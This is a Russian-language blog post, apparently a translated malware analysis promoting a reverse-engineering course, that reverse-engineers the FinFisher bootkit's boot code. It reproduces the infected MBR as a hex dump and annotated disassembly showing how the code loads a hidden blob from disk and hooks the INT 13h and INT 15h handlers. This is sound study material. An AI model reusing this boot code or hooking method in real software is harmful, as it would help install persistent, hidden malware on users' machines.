Анализ Буткита FinFisher

в 15:39, , рубрики: analysis, bootkit, Malware, windows, Блог компании Отус, реверс-инжиниринг

Добрый вечер! Ровно через неделю у нас стартует курс «Реверс-инжиниринг», и сегодня мы хотим поделиться с вами переводом материала, который имеет прямое отношение к этому курсу. Поехали.

Недавно мы исследовали вредоносный буткит FinFisher, опубликованный WikiLeaks. Большинство компонентов версии для Windows были достаточно простыми, так что перейдём сразу к драйверу режима ядра и загрузочному коду.

Анализ Буткита FinFisher - 1

Драйвер режима ядра напрямую считывает сырые данные с жесткого диска, либо записывает их на него. С упрощенной версией метода, используемого драйвером, можно ознакомиться в этой статье.

Вредоносная программа создает копию главной загрузочной записи (master boot record, сокращенно — MBR) и сохраняет ее отдельно на жестком диске. Помимо этого, программа записывает 0x2A00 байтов данных на инфицированный жесткий диск. Они впоследствии копируются вредоносным загрузочным кодом. Адрес первого сектора, содержащего эти данные, захардкожен в загрузочный код. Чтобы найти их физическое расположение, вредоносная программа использует Logical Block Addressing (LBA).
На тестовой машине MBR была перезаписана следующими данными:

        f9fef780 fa 31 c0 8e c0 8e d8 8e d0 bc fc ff fb 88 16 34  .1.............4
	f9fef790 7c 68 00 00 68 37 7c cb 18 a7 3f 01 00 00 00 00  |h..h7|...?.....
	f9fef7a0 15 00 00 00 2e a7 3f 01 00 00 00 00 89 c0 89 c9  ......?.........
	f9fef7b0 89 d2 31 02 00 00 00 b4 41 bb aa 55 cd 13 72 11  ..1.....A..U..r.
	f9fef7c0 81 fb 55 aa 75 0b f7 c1 01 00 74 05 c6 06 36 7c  ..U.u.....t...6|
	f9fef7d0 01 8a 16 34 7c b4 08 cd 13 88 c8 24 3f a2 c2 7c  ...4|......$?..|
	f9fef7e0 88 e8 88 cc c0 ec 06 40 a3 c3 7c 30 f6 fe c2 89  .......@..|0....
	f9fef7f0 16 c5 7c 66 8b 0e 18 7c 66 8b 16 1c 7c b8 00 01  ..|f...|f...|...
	f9fef800 2d 20 00 8e c0 66 31 db 66 51 8c c0 05 20 00 8e  - ...f1.fQ... ..
	f9fef810 c0 80 3e 36 7c 01 74 06 e8 62 00 e9 03 00 e8 36  ..>6|.t..b.....6
	f9fef820 00 66 59 66 81 c1 01 00 00 00 66 81 d2 00 00 00  .fYf......f.....
	f9fef830 00 66 ff 0e 20 7c 75 d0 8a 16 34 7c ea 00 10 00  .f.. |u...4|....
	f9fef840 00 00 00 00 00 00 00 10 00 01 00 00 00 00 00 00  ................
	f9fef850 00 00 00 00 00 00 00 8c c0 a3 cd 7c 89 1e cb 7c  ...........|...|
	f9fef860 66 89 0e cf 7c 66 89 16 d3 7c 66 52 66 31 d2 8a  f...|f...|fRf1..
	f9fef870 16 34 7c be c7 7c b4 42 cd 13 66 5a c3 66 52 66  .4|..|.B..fZ.fRf
	f9fef880 53 66 89 c8 66 31 d2 66 31 db 8a 1e c2 7c 66 f7  Sf..f1.f1....|f.
	f9fef890 f3 66 42 88 16 c1 7c 66 31 d2 66 31 db 8b 1e c5  .fB...|f1.f1....
	f9fef8a0 7c 66 f7 f3 8a 0e c1 7c 88 c5 88 d6 66 5b 8a 16  |f.....|....f[..
	f9fef8b0 34 7c b8 01 02 cd 13 66 5a c3 00 00 00 00 00 00  4|.....fZ.......
	f9fef8c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
	f9fef8d0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
	f9fef8e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
	f9fef8f0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
	f9fef900 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
	f9fef910 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
	f9fef920 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
	f9fef930 00 00 00 00 00 00 00 00 65 f7 65 f7 00 00 80 01  ........e.e.....
	f9fef940 01 00 07 fe ff ff 3f 00 00 00 d9 a6 3f 01 00 00  ......?.....?...
	f9fef950 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
	f9fef960 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
	f9fef970 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 aa  ..............U.

При быстром осмотре данных можно сделать вывод, что вредоносная программа изменила загрузочный код, но информация таблицы разделов осталась нетронутой.

Анализ Вредоносного Загрузочного Кода

Рассмотрим более подробно самые интересные части загрузочного кода. Во-первых, выполняется проверка установки Extended Disk Drive (EDD):

seg000:0037 B4 41                                   mov     ah, 41h ; 'A'
seg000:0039 BB AA 55                                mov     bx, 55AAh
seg000:003C CD 13                                   int     13h   

Вредоносная программа устанавливает флаг, который указывает, установлен ли EDD. Флаг контролирует метод, используемый вредоносной программой для чтения данных с жесткого диска в физическую память:

seg000:004C C6 06 36 7C 01                          mov     byte ptr ds:if_edd_installed, 1   ;7C36h

Затем, вредоносная программа получает параметры диска:

seg000:0051 8A 16 34 7C                             mov     dl, ds:7C34h	;drive number, first drive is 0x80
seg000:0055 B4 08                                   mov     ah, 8
seg000:0057 CD 13                                   int     13h

На данный момент, программа собрала достаточно информации для копирования вредоносного блоба на 0x2A00 байт с жесткого диска в физическую память. Блоб данных копируется по сектору за раз. Код ниже — цикл, используемый вредоносной программой для копирования кода:

seg000:0091 80 3E 36 7C 01                          cmp     byte ptr ds:if_edd_installed, 1
seg000:0096 74 06                                   jz      short loc_9E
seg000:0098 E8 62 00                                call    read_data_method_no_edd_installed
seg000:009B E9 03 00                                jmp     loc_A1
seg000:009E                         ; ---------------------------------------------------------------------------
seg000:009E
seg000:009E                         loc_9E:                                
seg000:009E E8 36 00                                call    read_data_method_edd_installed
seg000:00A1
seg000:00A1                         loc_A1:                                 
seg000:00A1 66 59                                   pop     ecx
seg000:00A3 66 81 C1 01 00 00 00                    add     ecx, 1
seg000:00AA 66 81 D2 00 00 00 00                    adc     edx, 0
seg000:00B1 66 FF 0E 20 7C                          dec     dword ptr ds:7C20h	;0x0015
seg000:00B6 75 D0                                   jnz     short loc_88

Ниже приведен код функции, которая используется для копирования данных при установке EDD:

BOOT_SECTOR:7CD7 8C C0                                   mov     ax, es
BOOT_SECTOR:7CD9 A3 CD 7C                                mov     word_7CCD, ax
BOOT_SECTOR:7CDC 89 1E CB 7C                             mov     word_7CCB, bx
BOOT_SECTOR:7CE0 66 89 0E CF 7C                          mov     dword_7CCF, ecx
BOOT_SECTOR:7CE5 66 89 16 D3 7C                          mov     dword_7CD3, edx
BOOT_SECTOR:7CEA 66 52                                   push    edx
BOOT_SECTOR:7CEC 66 31 D2                                xor     edx, edx
BOOT_SECTOR:7CEF 8A 16 34 7C                             mov     dl, byte_7C34
BOOT_SECTOR:7CF3 BE C7 7C                                mov     si, 7CC7h			
BOOT_SECTOR:7CF6 B4 42                                   mov     ah, 42h ; 'B'
BOOT_SECTOR:7CF8 CD 13                                   int     13h             
	; DISK - IBM/MS Extension - EXTENDED READ (DL - drive, DS:SI - disk address packet)

В этом примере, перед вызовом INT 13h для копирования первого сектора вредоносных данных в физическую память тестовой машины, мы имеем следующие аргументы:

	0x0000000000007cc7 <bogus+       0>:    0x0010  0x0001  0x0000  0x0100  0xa718  0x013f  
												 0x0000  0x0000
	+0: 0x10		- packet size
	+2: 0x1 		- number of sectors 
	+4: 0x0000  	- offset 
	+6: 0x1000		- segment
	+8: 0x013fa718	- LBA

После того, как вредоносная программа заканчивает копировать данные, она переходит к скопированному коду и продолжает выполнение там:

seg000:00B8 8A 16 34 7C                             mov     dl, ds:7C34h		;0x0000
seg000:00BC EA 00 10 00 00                          jmp     far ptr 0:1000h

Код в 0x1000 — самая интересная часть программы. Но перед тем, как продолжить анализ, стоит напомнить буткит FinFisher работает в реальном режиме. Это отличается от защищенного режима. Одно из отличий — приходится вычислять физические адреса с помощью комбинации регистров es:di и ds:si.
Формула для вычисления физического адреса — (сегмент * 0x10) + смещение. Например, если мы смотрим на пару es:di, то es — сегмент, а di — смещение. Все адреса ниже вычислены по этой формуле.
Теперь посмотрим на самую интересную часть кода. Во-первых, вредоносная программа вычисляет адрес сегмента, откуда копируются данные (это уже второй раз, когда копируется блоб данных):

seg000:0024 88 16 1B 00                             mov     ds:1Bh, dl
seg000:0028 BE 13 04                                mov     si, 413h
seg000:002B 26 8B 04                                mov     ax, es:[si]
seg000:002E 66 0F B7 C0                             movzx   eax, ax
seg000:0032 66 C1 E0 0A                             shl     eax, 0Ah
seg000:0036 66 2D C2 28 00 00                       sub     eax, 28C2h
	;before the segment address is stored:
	;<bochs:148> x /1hw 0x101c
	;[bochs]:0x000000000000101c <bogus+       0>:    0x00000000
seg000:003C 66 A3 1C 00                             mov     ds:1Ch, eax
	;ds = 0x0100, ds:1ch = hex((0x0100* 0x10) + 0x1c) = 0x101c
	;after the segment address is stored:
	;<bochs:150> x /1hw 0x101c
	;[bochs]:0x000000000000101c <bogus+       0>:    0x0009d33e

Затем, программа устанавливает хуки для обработчиков INT 13h и INT 15h. Как видно из приведенного выше кода, вредоносная программа не дает новых идей о том, как перехватить низкоуровневые обработчики прерывания:

seg000:0040 66 50                                   push    eax
seg000:0042 66 C1 E8 0A                             shr     eax, 0Ah
seg000:0046 26 89 04                                mov     es:[si], ax
	;es=0x0000, si = 0x0413
	;before:
	<bochs:156> x /1hw 0x413
	[bochs]:
	0x0000000000000413 <bogus+       0>:    0x0000027f

	;after:
	;<bochs:158> x /1hw 0x413
	[bochs]:
	0x0000000000000413 <bogus+       0>:    0x00000274

seg000:0049 66 58                                   pop     eax
seg000:004B
seg000:004B                         loc_4B:                                 
seg000:004B                                                                 
seg000:004B 66 C1 E8 04                             shr     eax, 4
seg000:004F A3 22 00                                mov     ds:22h, ax	
	;ax = 0x9d33
	;after:
	;<bochs:167> x /1hh 0x1022
	[bochs]:
	0x0000000000001022 <bogus+       0>:    0x9d33	
	
seg000:0052 FA                                      cli
seg000:0053                         loc_53:                                 
seg000:0053 8C D8                                   mov     ax, ds
seg000:0055 8E C0                                   mov     es, ax
seg000:0057 66 B8 20 E8 00 00                       mov     eax, 0E820h		
	;get system memory map	
seg000:005D 66 BA 50 41 4D 53                       mov     edx, 534D4150h 	;"SMAP"
seg000:0063 66 31 DB                                xor     ebx, ebx		
	;start at the beginning of the map.
seg000:0066 66 31 FF                                xor     edi, edi		
seg000:0069 BF 26 01                                mov     di, 126h		
	;es:di buffer that gets the result.
	;es = 0x100, di = 0x0126
seg000:006C 26 66 C7 45 14 01 00 00+                mov     dword ptr es:[di+14h], 1
seg000:0075 66 B9 18 00 00 00                       mov     ecx, 18h		
	;size of the buffer.
seg000:007B CD 15                                   int     15h             
	;BIOS Memory Services

seg000:007D 72 34                                   jb      short loc_B3	
seg000:007F 66 3D 50 41 4D 53                       cmp     eax, 534D4150h	
	;check if "SMAP"
seg000:0085 75 2C                                   jnz     short loc_B3
seg000:0087 66 85 DB                                test    ebx, ebx
seg000:008A 74 27                                   jz      short loc_B3
seg000:008C                                         db      3Eh
seg000:008C 3E 66 89 1E F2 02                       mov     ds:2F2h, ebx	
	;holds continuation value
	;ds = 0x100, physical address 0x12f2
seg000:0092 66 31 C0                                xor     eax, eax
seg000:0095 8E C0                                   mov     es, ax
seg000:0097                                         assume es:nothing
seg000:0097 26 66 A1 54 00                          mov     eax, dword ptr es:int_15_h 		;IVTABLE:0054
seg000:009C                                         db      3Eh
	;debug001:12EE 00 00 00 00             dword_12EE dd 0                         
	;debug001:12F2 01 00 00 00             dword_12F2 dd 1                
seg000:009C 3E 66 A3 EE 02                          mov     ds:2EEh, eax
	;debug001:12EE 59 F8 00 F0             dword_12EE dd 0F000F859h                
	;debug001:12F2 01 00 00 00             dword_12F2 dd 1       
seg000:00A1 A1 22 00                                mov     ax, ds:22h				;segment_hook
	;previously calculated value 0x9d33
seg000:00A4 66 C1 E0 10                             shl     eax, 10h
seg000:00A8 66 05 42 01 00 00                       add     eax, 142h
	;before hook is installed:
	IVTABLE:004C FE E3 00 F0             dword_4C dd 0F000E3FEh                  
	IVTABLE:004C                                                                 
	IVTABLE:0050 39 E7                   word_50 dw 0E739h                       
	IVTABLE:0052 00 F0                   word_52 dw 0F000h                       
	IVTABLE:0054 59 F8 00 F0             dword_54 dd 0F000F859h                  
	IVTABLE:0054      
seg000:00AE 26 66 A3 54 00               			mov     dword ptr es:int_15_h, eax			;hooks INT15h 
	;<bochs:206> x /1hw 0x54
	[bochs]:
	0x0000000000000054 <bogus+       0>:    0x9d330142
	
	;IVTABLE:0054 42 01                   word_54 dw 142h                        ;offset
	;IVTABLE:0056 33 9D                   dw 9D33h								 ;segment 

seg000:00B3                         loc_B3:                                                                                              
seg000:00B3 66 31 C0                                xor     eax, eax
seg000:00B6 8E C0                                   mov     es, ax
seg000:00B8 26 66 A1 4C 00                          mov     eax, dword ptr es:int_13_h	
	;before:
	;debug001:11D4 00 00 00 00             int_13_original dd 0   
	;after:
	;debug001:11D4 FE E3 00 F0             int_13_original dd 0F000E3FEh
seg000:00BD                                         db      3Eh
seg000:00BD 3E 66 A3 D4 01                          mov     ds:1D4h, eax
	;debug001:11CC FE E3 00 F0             int_13_original_1 dd 0F000E3FEh
seg000:00C2 3E 66 A3 CC 01                          mov     ds:1CCh, eax
seg000:00C7 A1 22 00                                mov     ax, ds:22h
	;0x9d33
seg000:00CA 66 C1 E0 10                             shl     eax, 10h
seg000:00CE                                         db      3Eh
seg000:00CE 3E 66 A3 51 02                          mov     ds:251h, eax
	;before:
	;debug001:1251 00 00 00 00             hook_segment dd 0 
	;after:
	;debug001:1251 00 00 33 9D             hook_segment dd 9D330000h
seg000:00D3 66 05 12 01 00 00                       add     eax, 112h
seg000:00D9 26 66 A3 4C 00                          mov     dword ptr es:loc_4B+1, eax		;hooks INT13h
	;es = 0x00 eax = 0x112
	
	;IVT after both INT 13h and INT 15h hooks are installed:
	IVTABLE:004C 12 01                   int_13_h dw 112h                       ; offset
	IVTABLE:004E 33 9D                   dw 9D33h								 ; segment
	IVTABLE:0050 39 E7                   word_50 dw 0E739h                       
	IVTABLE:0052 00 F0                   word_52 dw 0F000h                       
	IVTABLE:0054 42 01                   int_15_h dw 142h                        ; offset
	IVTABLE:0056 33 9D                   dw 9D33h								 ; segment

Теперь хуки установлены для INT 13h и INT 15h, но код для функций, перехватывающих INT, еще не скопирован в вычисленный сегмент. Очевидно, следующий шаг — скопировать код для перехваченных обработчиков:

seg000:00DE A1 22 00                                mov     ax, ds:22h
seg000:00E1 8E C0                                   mov     es, ax
seg000:00E3 31 FF                                   xor     di, di
seg000:00E5 B9 C2 28                                mov     cx, 28C2h
seg000:00E8 FC                                      cld
seg000:00E9 BE 3E 01                                mov     si, 13Eh
seg000:00EC F3 A4                                   rep movsb
	;si = 0x013e - source of the data to be copied.
	;di = 0x0000 - destination
	;cx = 0x28c2 - number of bytes to be copied.
	;ds = 0x0100, es = 0x9d33
	;the actual physical addresses of the source is ds:[si] = 
	;hex((0x0100 * 0x10) + 0x13e) = 0x113e 
	;the physical address of the destination is es:[di] = 
	;hex((0x9dd3 * 0x10) + 0x0000) = 0x9dd30
	
	;copies all the data copied in the first stage except for the first 0x13e bytes.
	;hex(0x2a00-0x28c2) = 0x13e

Теперь вредоносная программа готова вернуть управление исходной MBR, но сперва, ей нужно восстановить MBR до 0x7C00 (сектор, в котором находится копия исходной MBR, хранится в другом месте на жестком диске), а затем передать выполнение исходной MBR.

seg000:00EE FB                                      sti
seg000:00EF 66 8B 0E 13 00                          mov     ecx, ds:13h
seg000:00F4 66 8B 16 17 00                          mov     edx, ds:17h
seg000:00F9 66 89 0E 1E 01                          mov     ds:11Eh, ecx
seg000:00FE 66 89 16 22 01                          mov     ds:122h, edx
seg000:0103 BE 16 01                                mov     si, 116h		;buffer
	;ds = 0x0100, address 0x1116
seg000:0106 BB AA 55                                mov     bx, 55AAh
seg000:0109 8A 16 1B 00                             mov     dl, ds:1Bh		;drive number here 0x80
seg000:010D B4 42                                   mov     ah, 42h ; 'B'
seg000:010F CD 13                                   int     13h             
	;DISK - IBM/MS Extension - EXTENDED READ (DL - drive, DS:SI - disk address packet)
	;INT 13h is hooked now
	;debug003:0112 EA 00 00 33 9D          jmp     far ptr loc_9D330

	;<bochs:267> x /10hh 0x1116
	[bochs]:
	0x0000000000001116 <bogus+       0>:    0x0010  0x0001  0x7c00  0x0000  0xa72d  0x013f  0x
	0000    0x0000
	0x0000000000001126 <bogus+      16>:    0x0000  0x0000
	
	size of the packet 0x0010
	number of blocks to transfer = 0x0001
	destination 0x7c00
	LBA: 0x013fa7d2

	;Jumps to the original MBR here:
	
seg000:0111 EA 00 7C 00 00                          jmp     far ptr 0:7C00h

Что мы узнали из буткита FinFisher

Этот пример буткита FinFisher не предлагает новых техник или улучшений по сравнении с другими буткитами. Создатели вредоносных программ решили установить хуки для обработчиков INT 13h and INT 15h до того, как код для этих обработчиков копируется в память; что может быть катастрофично. Например, если код перехваченных функций-обработчиков не сможет скопироваться, может случиться краш системы.

Традиционно ждём ваши комментарии и приглашаем всех на день открытых дверей, который пройдет уже завтра.

Автор: MaxRokatansky

Источник

* - обязательные к заполнению поля


https://ajax.googleapis.com/ajax/libs/jquery/3.4.1/jquery.min.js